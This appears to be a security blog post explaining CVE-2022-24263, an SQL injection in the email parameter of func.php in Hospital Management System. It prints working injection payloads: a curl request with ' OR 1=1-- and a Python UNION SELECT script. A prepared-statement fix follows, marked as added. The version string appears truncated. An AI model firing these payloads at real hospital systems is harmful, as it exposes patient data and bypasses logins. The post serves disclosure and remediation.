The healthcare sector has been a juicy target for cyber attackers, and sometimes the vulnerabilities are hiding in plain sight inside widely used software. One such threat, identified as CVE-2022-24263, was found in Hospital Management System (HMS) v4., specifically within a file called func.php. This flaw allows attackers to perform SQL Injection through the email parameter. For hospitals and clinics relying on this free PHP-based system, the risks include unauthorized data access, leaked patient records, and worse.

Let's break down this vulnerability, how it can be attacked, and what developers and system admins need to know to keep their data safe.

What is CVE-2022-24263?

CVE-2022-24263 is a security vulnerability classified as SQL Injection in HMS v4., located in func.php, a PHP file that handles backend functionality. An attacker able to send crafted data to the system's email parameter can sneak malicious SQL straight into the database query, potentially exposing sensitive hospital and patient information.

1. A client (user, admin, attacker) sends data to the system, such as a login or record-search request.

2. Inside /Hospital-Management-System-master/func.php, the code takes the user-supplied email and embeds it directly into an SQL query without any sanitization or validation.

Here's a simplified version of the vulnerable PHP code:

```php
// func.php
$email = $_POST['email'];
$result = mysqli_query($con, "SELECT * FROM users WHERE email = '$email'");
```

No escaping. No parameterization. The attacker is free to craft any SQL statement they wish.

A malicious actor could send a POST request like this:

```shell
curl -X POST http://your-hospital-site.com/Hospital-Management-System-master/func.php \
-d "email=' OR 1=1-- "
```

This would change the query to:

```sql
SELECT * FROM users WHERE email = '' OR 1=1-- '
```

Instead of matching a single email, the query now returns every user record; with further modification, it lets the attacker bypass authentication, dump data, or even alter the database.

If the attacker is more ambitious, they could even union additional queries, extract password hashes, or modify patient data.

Below is a simple Python snippet that sends a malicious email parameter:

```python
import requests

# Placeholder host; the path is the vulnerable endpoint named in the advisory
target_url = "http://target-domain/Hospital-Management-System-master/func.php"
payload = "' UNION SELECT 1,2,3,4 -- "

data = {'email': payload}
r = requests.post(target_url, data=data)

print(r.text)  # Sensitive data may be leaked here
```

Here’s how to clean this up:

1. Use Prepared Statements / Parameterized Queries:
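One way to apply that fix, as an added example that is not code from the original post or the HMS project: the same email lookup from func.php rewritten with a mysqli prepared statement. The connection variable $con and the users/email names come from the page's vulnerable snippet; find_user_by_email is a hypothetical helper name.

```php
<?php
// Added example, not the HMS project's code: the func.php email lookup
// rewritten so that user input can never be parsed as SQL.
// $con is assumed to be the application's existing mysqli connection.

function find_user_by_email(mysqli $con, string $email): ?array
{
    // Defence in depth: reject values that cannot be an e-mail address.
    // The prepared statement below is what actually stops injection.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }

    // The SQL text is fixed at prepare time; the value is sent separately
    // as a bound parameter, so "' OR 1=1-- " is compared literally as a string.
    $stmt = $con->prepare("SELECT * FROM users WHERE email = ?");
    if ($stmt === false) {
        throw new RuntimeException("prepare failed: " . $con->error);
    }
    $stmt->bind_param("s", $email);   // "s" binds the value as a string
    $stmt->execute();

    $result = $stmt->get_result();    // requires the mysqlnd driver
    $row = $result->fetch_assoc();    // null when no row matched
    $stmt->close();
    return $row ?: null;
}

// Usage in func.php (hypothetical handler): one record or nothing, never all rows.
$email = $_POST['email'] ?? '';
$user = find_user_by_email($con, $email);
if ($user === null) {
    http_response_code(401);
    exit('no matching user');
}
```

Installations without mysqlnd can replace get_result() with bind_result()/fetch(); the binding of the email value is what matters.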

References

- Original disclosure: NVD CVE-2022-24263
- Exploit Database PoC: Exploit-DB 50778
- GitHub source (HMS v4.): Hospital-Management-System on GitHub

Conclusion

Hospital Management System v4. is used in many clinics due to its free, open nature—but this comes at a cost if you’re not careful. Unpatched installations are exposed and risky for both hospitals and patients. If you’re running this software, update or patch your code today, and ensure all user input is properly handled. Never let a trivial bug become the cause for a major data breach.


*If you found this article helpful, make sure to audit your hospital’s web applications for similar vulnerabilities!*

Timeline

Published on: 01/31/2022 22:15:00 UTC
Last modified on: 02/11/2022 18:01:00 UTC